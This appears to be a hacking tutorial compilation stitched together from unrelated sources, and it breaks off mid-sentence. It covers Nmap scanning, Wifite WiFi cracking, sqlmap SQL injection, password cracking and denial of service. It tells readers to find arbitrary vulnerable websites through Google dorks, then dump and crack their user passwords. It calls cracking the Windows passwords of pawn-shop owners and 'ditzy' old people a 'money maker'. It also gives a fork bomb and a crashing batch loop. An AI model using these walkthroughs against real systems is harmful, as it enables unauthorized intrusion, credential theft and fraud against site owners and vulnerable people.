AO[1]. Felix subconsciously decodes the CIDR notation[2] and recognizes this as 1,280 IP addresses. No problem. Being the careful type, Felix first starts out with what is known as an Nmap list scan (-sL option). This feature simply enumerates every IP address in the given target netblock(s) and does a reverse-DNS lookup (unless n was specified) on each. One reason to do this first is stealth. The names of the hosts can hint at potential vulnerabilities and allow for a better understanding of the target network, all without raising alarm bells[3]. Felix is doing this for another reason—to double-check that the IP ranges are correct. The systems administrator who provided the IPs might have made a mistake, and scanning the wrong company would be a disaster. The contract signed with Avatar Online may act as a get-out-of-jail-free card for penetrating their networks, but will not help if Felix accidentally compromises another company's server! The command he uses and an excerpt of the results are shown in Example 1.1 felix> nmap -sL 6.209.24.0/24 6.207.0.0/22 Starting Nmap ( http://nmap.org ) Nmap scan report for 6.209.24.0 Nmap scan report for fw.corp.avataronline.com (6.209.24.1) Nmap scan report for dev2.corp.avataronline.com (6.209.24.2) Nmap scan report for 6.209.24.3 Nmap scan report for 6.209.24.4 ... Nmap scan report for dhcp-21.corp.avataronline.com (6.209.24.21) Nmap scan report for dhcp-22.corp.avataronline.com (6.209.24.22) Nmap scan report for dhcp-23.corp.avataronline.com (6.209.24.23) ... Nmap scan report for 6.207.0.0 Nmap scan report for gw.avataronline.com (6.207.0.1) Nmap scan report for ns1.avataronline.com (6.207.0.2) Nmap scan report for ns2.avataronline.com (6.207.0.3) Nmap scan report for ftp.avataronline.com (6.207.0.4) Nmap scan report for 6.207.0.5 Nmap scan report for 6.207.0.6 Nmap scan report for www.avataronline.com (6.207.0.7) Nmap scan report for 6.207.0.8 ... Nmap scan report for cluster-c120.avataronline.com (6.207.2.120) Nmap scan report for cluster-c121.avataronline.com (6.207.2.121) Nmap scan report for cluster-c122.avataronline.com (6.207.2.122) ... Nmap scan report for 6.207.3.255 Nmap done: 1280 IP addresses (0 hosts up) scanned in 331.49 seconds felix> Reading over the results, Felix finds that all of the machines with reverse-DNS entries resolve to Avatar Online. No other businesses seem to share the IP space. Moreover, these results give Felix a rough idea of how many machines are in use and a good idea of what many are used for. He is now ready to get a bit more intrusive and try a port scan. He uses Nmap features that try to determine the application and version number of each service listening on the network. He also requests that Nmap try to guess the remote operating system via a series of low-level TCP/IP probes known as OS fingerprinting. This sort of scan is not at all stealthy, but that does not concern Felix. He is interested in whether the administrators of AO even notice these blatant scans. After a bit of consideration, Felix settles on the following command: nmap -sS -p- -PE -PP -PS80,443 -PA3389 -PU40125 -A -T4 -oA avatartcpscan%D 6.209.24.0/24 6.207.0.0/22 Intro – Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts. It uses raw IP packets in novel ways to determine what hosts are available on the network, what services (application name and version) those hosts are offering, what operating systems (and OS versions) they are running, what type of packet filters/firewalls are in use, and dozens of other characteristics. While Network Mapper is commonly used for security audits, many systems and network administrators find it useful for routine tasks such as network inventory, managing service upgrade schedules, and monitoring host or service uptime. 1. How to open nmap A. GUI method Application → Kali Linux → Information gathering → DNS Analysis → nmap B. open terminal type nmap hit enter 2. Scan a single IP address When firewall OFF/ON on target PC Syntax – nmap IP address/hostname EX – nmap 192.168.75.131 Ex- nmap google.com 3. Boost up Your nmap Scan – using this command u can decrease scan time Syntax – nmap –F IP address Ex – nmap –F google.com 4. Scan multiple IP address or subnet A. scan a range of IP address Syntax – nmap IP address range EX- nmap 192.168.75.1-131 B. Scan a range of IP address using a wildcard Ex – nmap 192.168.75.* C. Scan an entire subnet Ex – nmap 192.168.75.1/24 5. scan turn on OS and version detection Ex – nmap –O 192.168.75.131 6. Scan all TCP port in target IP Ex – nmap –sT 192.168.75.131 7. Scan a firewall for security weakness A. Null scan – TCP Null Scan to fool a firewall to generate a response Ex – nmap –sN 192.168.75.131 B. Fin scan – TCP Fin scan to check firewall Ex – nmap –sF 192.168.75.131 C. TCP Xmas scan to check firewall Ex – nmap –sX 192.168.75.131 8. UDP Scan – Scan a host for UDP services. This scan is used to view open UDP port. Ex – nmap –sU 192.168.75.131 9. Scan for IP protocol – This type of scan allows you to determine which IP protocols (TCP, ICMP, IGMP, etc.) are supported by target machines. Ex – nmap –sO 192.168.75.131 10. detect remote services (server / daemon) version numbers Ex – nmap –sV 192.168.75.131 11. Find out the most commonly used TCP ports using TCP SYN Scan A. Stealthy scan Ex – nmap –sS 192.168.75.131 B. Find out the most commonly used TCP ports using TCP connect scan Ex – nmap –sT 192.168.75.131 C. Find out the most commonly used TCP ports using TCP ACK scan Ex – nmap –sA 192.168.75.131 D. Find out the most commonly used TCP ports using TCP Window scan Ex – nmap –sW 192.168.75.131 E. Find out the most commonly used TCP ports using TCP Maimon scan Ex – nmap – sM 192.168.75.131 12. List Scan – this command is used tolist target to scan Ex – nmap –sL 192.168.75.131 13. Host Discovery or Ping Scan – Scan a network and find out which servers and devices are up and running Ex – nmap –sP 192.168.75.0/24 14. Scan a host when protected by the firewall Ex – nmap –PN 192.168.75.1 Lesson 6: Wifi Hacking the easy way: Using WIFITE Wifite While the aircrack-ng suite is a well known name in the wireless hacking , the same can't be said about Wifite. Living in the shade of the greatness of established aircrack-ng suite, Wifite has finally made a mark in a field where aircrack-ng failed. It made wifi hacking everyone's piece of cake. While all its features are not independent (eg. it hacks WPS using Reaver), it does what it promises, and puts hacking on autopilot. I'm listing some features, before I tell you how to use wifite (which I don't think is necessary at all, as anyone who can understand simple English instructions given by Wifite can use it on his own). Features Of Wifite Sorts targets by signal strength (in dB); cracks closest access points first Automatically de-authenticates clients of hidden networks to reveal SSIDs Numerous filters to specify exactly what to attack (wep/wpa/both, above certain signal strengths, channels, etc) Customizable settings (timeouts, packets/sec, etc)" Anonymous" feature; changes MAC to a random address before attacking, then changes back when attacks are complete All captured WPA handshakes are backed up to wifite.py's current directory Smart WPA de-authentication; cycles between all clients and broadcast deauths Stop any attack with Ctrl+C, with options to continue, move onto next target, skip to cracking, or exit Displays session summary at exit; shows any cracked keys All passwords saved to cracked.txt Built-in updater: ./wifite.py -upgrade I find it worth mentioning here, that not only does it hack wifi the easy way, it also hack in the best possible way. For example, when you are hacking a WEP wifi using Wifite, it uses fakeauth and uses the ARP Method to speed up data packets. Hacking WEP network wifite -wep You might even have used the command wifite The -wep makes it clear to wifite that you want to hack WEP wifis only. It'll scan the networks for you, and when you think it has scanned enough, you can tell it to stop by typing ctrl+c. It'll then ask you which wifi to hack. In my case, I didn't specify -wep so it shows all the wifis in range. You can also select all and then go take a nap (or maybe go to sleep). When you wake up, you might be hacking all the wifi passwords in front of you. I typed one and it had gathered 7000 IVs (data packets) within 5 mins. Basically you can except it to hack the wifi in 10 mins approx. Notice how it automatically did the fake auth and ARP replay. Here are a few more screenshots of the working of Wifite, from their official website (./wifite.py is not something that should bother you. You can stick with the simple wifite. Also, specifying the channel is optional so even the -c 6 was unnecessary. Notice that instead of ARP replay, the fragmentation attack was used, using -frag) Hacking WPS wasn't fast (it took hours), but it was easy and didn't require you to do anything but wait. However, Wifite makes it possible for you to use any method that you want to use, by just naming it. As you saw in the screenshot above, the fragmentation attack was carried out just by typing -frag. Similarly, many other attacks can be played with. A good idea would be to execute the followingwifite -help This will tell you about the common usage commands, which will be very useful. Here is the list of WEP commands for different attacksWEP -wep only target WEP networks [off] -pps <num> set the number of packets per second to inject [600] -wept <sec> sec to wait for each attack, 0 implies endless [600] -chopchop use chopchop attack [on] -arpreplay use arpreplay attack [on] -fragment use fragmentation attack [on] -caffelatte use caffe-latte attack [on] -p0841 use -p0841 attack [on] -hirte use hirte (cfrag) attack [on] -nofakeauth stop attack if fake authentication fails [off] -wepca <n> start cracking when number of ivs surpass n [10000] -wepsave save a copy of .cap files to this directory [off] Troubleshooting Wifite quits unexpectedly, sating "Scanning for wireless devices. No wireless interfaces were found. You need to plug in a wifi device or install drivers. Quitting." You are using Kali inside a virtual machine most probably. Virtual machine does not support internal wireless card. Either buy an external wireless card, or do a live boot / side boot with Windows. Anything other than Virtual machine in general. Lesson 7: Sql Injection using SQLMap Disclaimer: using this program on any website without permission is illegal. By reading and/or utilizing this tutorial you accept sole responsibility for your actions and release Opsec Cybersecurity Solutions LLC and its employees from any legal liability for your actions. Sql injection is a way of extracting user login info and other data from unsecure sql databases on companies servers. It is one of the most common ways sites are hacked. What is SQLMAP sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections. Features Full support for MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase and SAP MaxDB database management systems. Full support for six SQL injection techniques: boolean-based blind, time-based blind, error-based, UNION query, stacked queries and out-of-band. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns. Automatic recognition of password hash formats and support for cracking them using a dictionary-based attack.Support to dump database tables entirely, a range of entries or specific columns as per user’s choice. The user can also choose to dump only a range of characters from each column’s entry. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.Support to download and upload any file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to execute arbitrary commands and retrieve their standard output on the database server underlying operating system when the database software is MySQL, PostgreSQL or Microsoft SQL Server. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command. [Source: www.sqlmap.org] Step 1: Find a Vulnerable Website This is usually the toughest bit and takes longer than any other steps. Those who know how to use Google Dorks knows this already, but in case you don’t I have put together a number of strings that you can search in Google. Just copy paste any of the lines in Google and Google will show you a number of search results. Step 1.a: Google Dorks strings to find Vulnerable SQLMAP SQL injectable website You can google a list of google dork strings Step 1.b: Initial check to confirm if website is vulnerable to SQLMAP SQL Injection For every google dork string, you will get huundreds of search results. How do you know which is really vulnerable to SQLMAP SQL Injection. There’s multiple ways and I am sure people would argue which one is best but to me the following is the simplest and most conclusive. Let’s say you searched using this string inurl:item_id= and one of the search result shows a website like this: http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 Just add a single quotation mark ' at the end of the URL. (Just to ensure, " is a double quotation mark and ' is a single quotation mark). So now your URL will become like this: http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15' If the page returns an SQL error, the page is vulnerable to SQLMAP SQL Injection. If it loads or redirect you to a different page, move on to the next site in your Google search results page. See example error below in the screenshot. I’ve obscured everything including URL and page design for obvious reasons. Examples of SQLi Errors from Different Databases and Languages Microsoft SQL Server Server Error in ‘/’ Application. Unclosed quotation mark before the character string ‘attack;’. Description: An unhanded exception occurred during the execution of the current web request. Please review the stack trace for more information about the error where it originated in the code. Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark before the character string ‘attack;’. MySQL Errors Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /var/www/myawesomestore.com/buystuff.php on line 12 Error: You have an error in your SQL syntax: check the manual that corresponds to your MySQL server version for the right syntax to use near ‘’’ at line 12 Oracle Errors java.sql.SQLException: ORA-00933: SQL command not properly ended at oracle.jdbc.dbaaccess.DBError.throwSqlException(DBError.java:180) at oracle.jdbc.ttc7.TTIoer.processError(TTIoer.java:208) Error: SQLExceptionjava.sql.SQLException: ORA-01756: quoted string not properly terminated PostgreSQL Errors Query failed: ERROR: unterminated quoted string at or near “‘’’” Step 2: List DBMS databases using SQLMAP SQL Injection As you can see from the screenshot above, I’ve found a SQLMAP SQL Injection vulnerable website. Now I need to list all the databases in that Vulnerable database. (this is also called enumerating number of columns). As I am using SQLMAP, it will also tell me which one is vulnerable. Run the following command on your vulnerable website with. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 --dbs In here: sqlmap = Name of sqlmap binary file -u = Target URL (e.g. “http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15″) --dbs = Enumerate DBMS databases This commands reveals quite a few interesting info: web application technology: Apache back-end DBMS: MySQL 5.0 [10:55:53] [INFO] retrieved: information_schema [10:55:56] [INFO] retrieved: sqldummywebsite [10:55:56] [INFO] fetched data logged to text files under '/usr/share/sqlmap/output/www.sqldummywebsite.com' So, we now have two database that we can look into. information_schema is a standard database for almost every MYSQL database. So our interest would be on sqldummywebsitedatabase. Step 3: List tables of target database using SQLMAP SQL Injection Now we need to know how many tables this sqldummywebsite database got and what are their names. To find out that information, use the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite --tables Sweet, this database got 8 tables. [10:56:20] [INFO] fetching tables for database: 'sqldummywebsite' [10:56:22] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:56:22] [INFO] the SQL query used returns 8 entries [10:56:25] [INFO] retrieved: item [10:56:27] [INFO] retrieved: link [10:56:30] [INFO] retrieved: other [10:56:32] [INFO] retrieved: picture [10:56:34] [INFO] retrieved: picture_tag [10:56:37] [INFO] retrieved: popular_picture [10:56:39] [INFO] retrieved: popular_tag [10:56:42] [INFO] retrieved: user_info and of course we want to check whats inside user_info table using SQLMAP SQL Injection as that table probably contains username and passwords. Step 4: List columns on target table of selected database using SQLMAP SQL Injection Now we need to list all the columns on target table user_info of sqldummywebsitedatabase using SQLMAP SQL Injection. SQLMAP SQL Injection makes it really easy, run the following command: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -columns This returns 5 entries from target table user_info of sqldummywebsite database. [10:57:16] [INFO] fetching columns for table 'user_info' in database 'sqldummywebsite' [10:57:18] [INFO] heuristics detected web page charset 'ISO-8859-2' [10:57:18] [INFO] the SQL query used returns 5 entries [10:57:20] [INFO] retrieved: user_id [10:57:22] [INFO] retrieved: int(10) unsigned [10:57:25] [INFO] retrieved: user_login [10:57:27] [INFO] retrieved: varchar(45) [10:57:32] [INFO] retrieved: user_password [10:57:34] [INFO] retrieved: varchar(255) [10:57:37] [INFO] retrieved: unique_id [10:57:39] [INFO] retrieved: varchar(255) [10:57:41] [INFO] retrieved: record_status [10:57:43] [INFO] retrieved: tinyint(4) AHA! This is exactly what we are looking for … target table user_login and user_password. Step 5: List usernames from target columns of target table of selected database using SQLMAP SQL Injection SQLMAP SQL Injection makes is Easy! Just run the following command again: sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_login --dump Guess what, we now have the username from the database: [10:58:39] [INFO] retrieved: userX [10:58:40] [INFO] analyzing table dump for possible password hashes Almost there, we now only need the password to for this user.. Next shows just that.. Step 6: Extract password from target columns of target table of selected database using SQLMAP SQL Injection You’re probably getting used to on how to use SQLMAP SQL Injection tool. Use the following command to extract password for the user. sqlmap -u http://www.sqldummywebsite.com/cgi-bin/item.cgi?item_id=15 -D sqldummywebsite -T user_info -C user_password --dump TADA!! We have password. [10:59:15] [INFO] the SQL query used returns 1 entries [10:59:17] [INFO] retrieved: 24iYBc17xK0e. [10:59:18] [INFO] analyzing table dump for possible password hashes Database: sqldummywebsite Table: user_info [1 entry] +---------------+ | user_password | +---------------+ | 24iYBc17xK0e. | +---------------+ But hang on, this password looks funny. This can’t be someone’s password.. Someone who leaves their website vulnerable like that just can’t have a password like that. That is exactly right. This is a hashed password. What that means, the password is encrypted and now we need to decrypt it Step 7: Cracking password So the hashed password is 24iYBc17xK0e. . How do you know what type of hash is that? Step 7.a: Identify Hash type Luckily, Kali Linux provides a nice tool and we can use that to identify which type of hash is this. In command line type in the following command and on prompt paste the hash value: hash-identifier Excellent. So this is DES(Unix) hash. Step 7.b: Crack HASH using cudahashcat First of all I need to know which code to use for DES hashes. So let’s check that: cudahashcat --help | grep DES So it’s either 1500 or 3100. But it was a MYSQL Database, so it must be 1500. I am running a Computer thats got NVIDIA Graphics card. That means I will be using cudaHashcat. On my laptop, I got an AMD ATI Graphics cards, so I will be using oclHashcat on my laptop. If you’re on VirtualBox or VMWare, neither cudahashcat nor oclhashcat will work. You must install Kali in either a persisitent USB or in Hard Disk. Instructions are in the website, search around. I saved the hash value 24iYBc17xK0e. in DES.hash file. Following is the command I am running: cudahashcat -m 1500 -a 0 /root/sql/DES.hash /root/sql/rockyou.txt Interesting find: Usuaul Hashcat was unable to determine the code for DES hash. (not in it’s help menu). However both cudaHashcat and oclHashcat found and cracked the key. Anyhow, so here’s the cracked password: abc123. 24iYBc17xK0e.:abc123 Sweet, we now even have the password for this user. Lesson 8: Cracking Windows Passwords in Kali Linux This is probably your number one money maker. Pawn shops whos computer forfeited out and need to be sold, to citizens and old people who are just ditzy. Enjoy. Crack and Reset the system password locally using Kali Insert the USB Live CD and Boot your PC. Make sure the Boot from USB is the first option in the Boot menu at BIOS. Boot Windows machine with the LiveCD. On the boot menu of Kali Linux, select Live (forensic mode). Kali Linux initialize and when it loads, it will open a terminal window and navigate to the Windows password database file Crack the Windows password with ophcrack: After loading Live kali linux go to the system menu > ophcrack click ok Ophcrack uses Rainbow Tables to crack NTLM and LM hashes into plain text, its a free Windows password cracker based on rainbow tables. It is a very efficient implementation of rainbow tables done by the inventors of the method. If you have a complex password it will take a lot longer than simple passwords, and with the free tables your password may never be cracked. Once the crack is done you will see the password in plain text, write it down and reboot the machine to login. If your password isn’t cracked, you can also log in as one of the other users with admin rights and then change your password from within Windows. With the free tables available you will not be able to crack every password, but the paid tables range from $100 to $1000.Windows uses NTLM hashes to encrypt the password file which gets stored in SAM file. We simply need to target this file to retrieve the password Now you can see the ophcrack application windows. Here, click on Load > Encrypted SAM After that we need to give the path to SAM directory which is by default /mnt/hda1/WINDOWS/System32 click choose Here we can see the saved hashed now with the username and userid. Now click on Crack button and wait for the password. Its quick and easy That’s it. It’ll show the password , if you unsuccessfully go with free tables. I downloaded the xp free small and the Vista free tables. Once you have downloaded the tables you will need to unzip them in separate folders. I made a folder called “hash-tables” and then made 2 more folders within for each table to unzip to. Run the program and click on “Tables” button. Select the table you downloaded and click “Install”, navigate to the folder where you unzipped the table, select it and then click “ok.” You should see green lights next to the tables you installed. Reset Windows password with chntpw: Navigate to the Windows password database file. Almost all versions of windows password is saved in SAM file. This file is usually located under /Windows/System32/config. On your system it may look something like this: /media/hda1/Windows/System32/config. The SAM database is usually in the /media/name_of_hard_drive/Windows/System32/config Type command chntpw -l SAM and it will list out all the usernames that are contained on the Windows system. #chntpw -l SAM The command gives us a list of usernames on the system. When we have the username we want to modify and we simply run the command chntpw -u “username” SAM In the example below we typed: chntpw -u “Sanjai sathish” SAM and we get the following menu: #chntpw -u Sanjai sathish We now have the option of clearing the password, changing the password, or promoting the user to administrator. Changing the password does not always work on Windows 7,8 systems. it may works on XP system, so it is recommended to clear the password. Therefore you will be able to log in with a blank password. You can also promote the user to a local administrator as well. Crack the password in Linux using John the ripper: John the Ripper is a fast password cracker, Its primary purpose is to detect weak Unix passwords. Besides several crypt(3) password hash types most commonly found on various Unix systems, supported out of the box are Windows LM hashes, plus lots of other hashes and ciphers in the community-enhanced version John the ripper is a popular dictionary based password cracking tool. It uses a wordlist full of passwords and then tries to crack a given password hash using each of the password from the wordlist. In other words its called brute force password cracking and is the most basic form of password cracking. It is also the most time and cpu consuming technique. More the passwords to try, more the time required. But still if you want to crack a password locally on your system then john is one of the good tools to try. John is in the top 10 security tools in Kali linux. In this topic i am going to show you, how to use the unshadow command along with john to crack the password of users on a linux system. On linux the username/password details are stored in the following 2 files #/etc/passwd #/etc/shadow The actual password hash is stored in /etc/shadow and this file is accessible on with root access to the machine. So try to get this file from your own linux system. Or first create a new user with a simple password. I will create a new user on my linux system named happy, with password chess. Now that our new user is already created its time to crack his password. #unshadow The unshadow command will basically combine the data of /etc/passwd and /etc/shadow to create 1 file with username and password details. Usage is quite simple. #unshadow /etc/passwd /etc/shadow > ~/crack We redirected the output of unshadow command to a new file called crack. Now this new file shall be cracked by john. For the wordlist we shall be using the password list that comes with john on kali linux. It is located at the following path /usr/share/john/password.lst or you can use your own password lists too. #john –wordlist=/usr/share/john/password.lst ~/crack Use the “–show” option to display all of the cracked passwords reliably So in the above command john was able to crack the hash and get us the password “chess” for the user “happy”. Now john was able to crack, only because the password “chess” was present in the password list. If it were not there then john would have failed. Use the show option to list all the cracked passwords. #john –show ~/crack Just like most other things associated with hacking, a denial of service attack is not everyone's cup of tea. It, however, can be understood if explained properly. In this tutorial, I'll try to give you a big picture of denial of service attacks, before I start using geeky terms like packets and all that. We'll start at the easiest point. What effect does a denial of service attack have Wireless hacking usually gives you the password of a wireless network. A man in the middle attack lets you spy on network traffic. Exploiting a vulnerability and sending a payload gives you access and control over the target machine. What exactly does a Denial of Service (DOS) attack do? Basically, it robs the legitimate owner of a resource from the right to use it. I mean if I successfully perform a DOS on your machine, you won't be able to use it anymore. In the modern scenario, it is used to disrupt online services. Many hacktivist groups (internet activists who use hacking as a form of active resistance - a name worth mentioning here is Anonymous) do a Distributed Denial of service attack on government and private websites to make them listen to the people's opinion (the legitimacy of this method of dictating your opinion has been a topic of debate, and a lot of hactivists had to suffer jailtime for participating in DDOS). So basically it's just what its name suggests, Denial Of Service. Basic Concept It uses the fact that while a service can be more than sufficient to cater to the demands of the desired users, a drastic increase in unwelcome users can make the service go down. Most of us use the words like "This website was down the other day" without any idea what it actually means. Well now you do. To give you a good idea of what is happening, I'll take the example from the movie "We Are Legion". Scenario One : Multiplayer online game Now consider you are playing an online multi-player game. There are millions of other people who also play this game. Now there's a pool in the game that everyone likes to visit. Now you and your friends know that they have the power of numbers. There are a lot of you, and together you decide to make identical characters in the game. And then all of you go and block the access to the pool. You just carried out a denial of service attack. The users of the game have now been deprived of a service which they had obtained the right to use when they signed up for the game. This is just what the guys at 4chan (birthplace and residence of Anonymous) did a long time ago. This is the kind of thing that gives you a very basic idea what a denial of service attack can be. They made a Swastika and blocked access to the pool Scenario 2 : Bus stop Now assume that due to some reason, you want to disrupt the bus service of your city and stop the people from using the service. To stop the legitimate people from utilizing this service, you can call your friends to unnecessarily use it. Basically you can invite millions of friends to come and crowd around all the bus stops and take the buses without any purpose. Practically it is not feasible since you don't have millions of friends, and they are definitely not wasting their time and money riding aimlessly from one place to another. So while this may seem impossible in the real world, in the virtual world, you can cause as much load as a thousand (or even a million) users alone at the click of a button. There are many tools out there for this purpose, however, you are not recommended to use them as a DOS on someone else is illegal, and easy to detect (Knock, knock. It's the police). We will, come back to this later, and do a DOS on our own computer. How denial of service attacks are carried out Basically, when you visit a website, you send them a request to deliver their content to you. What you send is a packet. Basically, it take more than just one packet, you need a lot of them. But still, the bandwidth that you consume in requesting the server to send you some data is very little. In return, the data they send you is huge. This takes up server resources, for which they pay for. A legitimate view can easily earn more than the server costs on account of advertisements, etc. So, companies buy server that can provide enough data transfer for its regular users. However, if the number of users suddenly increases, the server gives up. It goes down. And since the company knows it under DOS, it just turns off the server, so that it does not have to waste its monetary resources on a DOS, and wait till the DOS stops. Now with the modern computers and bandwidth, we alone can easily pretend to be a thousand or even more users at once. While this is not good for the server, it is not something that can make it succumb (your computer is not the only thing that gets better with time, the servers do too). However, if a lot of people like you do a DOS attack, it becomes a distributed denial of service attack. This can easily be fatal for a server. It's just like you go to a page, and start refreshing it very fast, maybe a thousand times every second. And you are not the only one. There are thousand others that are doing the same thing. So basically you guys are equivalent to more than a million users using the site simultaneously, and that's not something the server can take. Sites like Google and Facebook have stronger servers, and algorithms that can easily identify a DOS and block the traffic from that IP. But it's not just the websites that get better, and the black hat hackers too are improving every day. This leaves a huge scope for understanding DOS attacks and becoming an asset to one of these sides ( the good, the bad and the ugly). A Live DOS on your Kali Machine We are going to execute a command in the Kali linux terminal that will cripple the operating system and make it hand. It will most probably work on other linux distributions too. Warning : This code will freeze Kali linux, and most probably it will not recover from the shock. You'll lose any unsaved data. You will have to restart the machine the hard way (turn of the virtual machine directly or cut the power supply if its a real machine). Just copy paste the code and your computer is gone. :(){ :|:& };: The machine froze right after I pressed enter. I had to power it off from the Vmware interface. What basically happened is that the one line command asked the operating system to keep opening process very fast for an infinite period of time. It just gave up. Here's something for the Windows Users Crashing Windows Using Batch file Open a notepad. Put the following code in it:1 Start goto 1 Save the file as name.bat Bat here is batch file extension. Run it. Game over. It basically executes the second line, and the third line makes it go over to the first, execute the second, and then over to first again, execute the second..... infinitely. So again, denial of service. All the processing power is used by a useless command, while you, the legitimate user, can't do anything. Lesson 10: Introduction to Python Python is a very diverse programming language and is excellent to learn, today at codingsec we will run through an introductory tutorial to get you more familiar with how the fundamentals of the language works. The best way to learn to code is to actually put what you read today in to practice! ##Python is easy to learn print(“Hello, World!”) Installing Python In order to get started on learning Python, you will need to install the required software.For Python programming you need a working Python installation and a text editor. To download the required software please http://www.python.org/download you will find numerous download links there. Python is very diverse and compatible what ever operating system you are using. LINUX, BSD, AND UNIX USERS You are probably lucky and Python is already installed on your machine. To test it typepython3 on a command line. If you see something like that in the following section, you are set. If you have to install Python, first try to use the operating system’s package manager or go to the repository where your packages are available and get Python 3. Python 3.0 was released in December 2008; all the distributions should have Python 3 available, so you may not need to compile Python 3 from scratch after downloading the source code. Ubuntu and Fedora do have Python 3 binary packages available, but they are not yet the default, so they need to be installed specially. Roughly, here are the steps to compile Python in UNIX Download the .tgz file (use your Web browser to get the gzipped tar file fromhttps://www.python.org/downloads/release/python-341)Uncompress the tar file (put in the correct path to where you downloaded it):$ tar -xvzf ~/Download/Python-3.4.1.tgz <i>... list of files as they are uncompressed </i>Change to the directory and tell the computer to compile and install the program$ cd Python-3.4/ $ ./configure --prefix=$HOME/python3_install <i> ... lots of output. Watch for error messages here ... </i> $ make <i> ... even more output. Hopefully no error messages ... </i> $ make installAdd python 3 to your path. You can test it first by specifying the full path. You should add $HOME/python3_install/bin to your PATH bash variable.$ ~/python3_install/bin/python3 Python 3.4.1 (... size and date information ...) [GCC 4.5.2] on linux2 Type "help", "copyright", "credits" or "license" for more information. >>> The above commands will install Python 3 to your home directory, which is probably what you want, but if you skip the --prefix, it will install it to /usr/local. If you want to use the IDLE graphical code editor, you need to make sure that the tk and tcl libraries, together with their development files, are installed on the system. You will get a warning during the make phase if these are not available. MAC USERS Starting from Mac OS X (Tiger), Python ships by default with the operating system, but you will need to update to Python 3 until OS X starts including Python 3 (check the version by starting python3 in a command line terminal). Also IDLE (the Python editor) might be missing in the standard installation. If you want to (re-)install Python, get the MacOS installer from the Python download site. WINDOWS USERS Download the appropriate Windows installer (the x86 MSI installer, if you do not have a 64-bit AMD or Intel chip). Start the installer by double-clicking it and follow the prompts. See https://docs.python.org/3/using/windows.html#installing-python for more information. CONFIGURING YOUR PATH ENVIRONMENT VARIABLE The PATH environment variable is a list of folders, separated by semicolons, in which Windows will look for a program whenever you try to execute one by typing its name at a Command Prompt. You can see the current value of your PATH by typing this command at a Command Prompt: echo %PATH% The easiest way to permanently change environment variables is to bring up the built-in environment variable editor in Windows. How you get to this editor is slightly different on different versions of Windows. On Windows 8: Press the Windows key and type Control Panel to locate the Windows Control Panel. Once you’ve opened the Control Panel, select View by: Large Icons, then click on System. In the window that pops up, click the Advanced System Settings link, then click the Environment Variables... button. On Windows 7 or Vista: Click the Start button in the lower-left corner of the screen, move your mouse over Computer, right-click, and select Properties from the pop-up menu. Click the Advanced System Settings link, then click the Environment Variables...button. On Windows XP: Right-click the My Computer icon on your desktop and selectProperties. Select the Advanced tab, then click the Environment Variables... button. Once you’ve brought up the environment variable editor, you’ll do the same thing regardless of which version of Windows you’re running. Under System Variables in the bottom half of the editor, find a variable called PATH. If there is is one, select it and click Edit.... Assuming your Python root is C:\Python34, add these two folders to your path (and make sure you get the semicolons right; there should be a semicolon between each folder in the list): C:\Python34 C:\Python34\Scripts Note: If you want to double-click and start your Python programs from a Windows folder and not have the console window disappear, you can add the following code to the bottom of each script: <tt><span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello World"</span><span class="br0">)</span> <span class="co1">#stops console from exiting</span> end_prog <span class="sy0">=</span> <span class="st0">""</span> <span class="kw1">while</span> end_prog <span class="sy0">!=</span> <span class="st0">"q"</span>: end_prog <span class="sy0">=</span> <span class="kw2">input</span><span class="br0">(</span><span class="st0">"type q to quit"</span><span class="br0">)</span></tt> INTERACTIVE MODE Go into IDLE (also called the Python GUI). You should be presented with a window that has some text like this: Python 3.0 (r30:67503, Dec 29 2008, 21:31:07) [GCC 4.3.2 20081105 (Red Hat 4.3.2-7)] on linux2 Type "copyright", "credits" or "license()" for more information. **************************************************************** Personal firewall software may warn about the connection IDLE makes to its subprocess using this computer's internal loopback interface. This connection is not visible on any external interface and no data is sent to or received from the Internet. **************************************************************** IDLE 3.0 >>> The >>> is Python’s way of telling you that you are in interactive mode. In interactive mode what you type is immediately run. Try typing 1+1 in. Python will respond with2. Interactive mode allows you to test out and see what Python will do. If you ever feel you need to play with new Python statements, go into interactive mode and try them out. CREATING AND RUNNING PROGRAMS Go into IDLE if you are not already. In the menu at the top, select File then New File. In the new window that appears, type the following: <span class="kw1">print</span><span class="br0">(</span><span class="st0">"Hello, World!"</span><span class="br0">)</span> Now save the program: select File from the menu, then Save. Save it as “hello.py” (you can save it in any folder you want). Now that it is saved it can be run. Next run the program by going to Run then Run Module (or if you have an older version of IDLE use Edit then Run script). This will output Hello, World! on the*Python Shell* window. PROGRAM FILE NAMES It is very useful to stick to some rules regarding the file names of Python programs. Otherwise some things might go wrong unexpectedly. These don’t matter as much for programs, but you can have weird problems if you don’t follow them for module names (modules will be discussed later). Always save the program with the extension .py. Do not put another dot anywhere else in the file name.Only use standard characters for file names: letters, numbers, dash (-) and underscore (_).White space (” 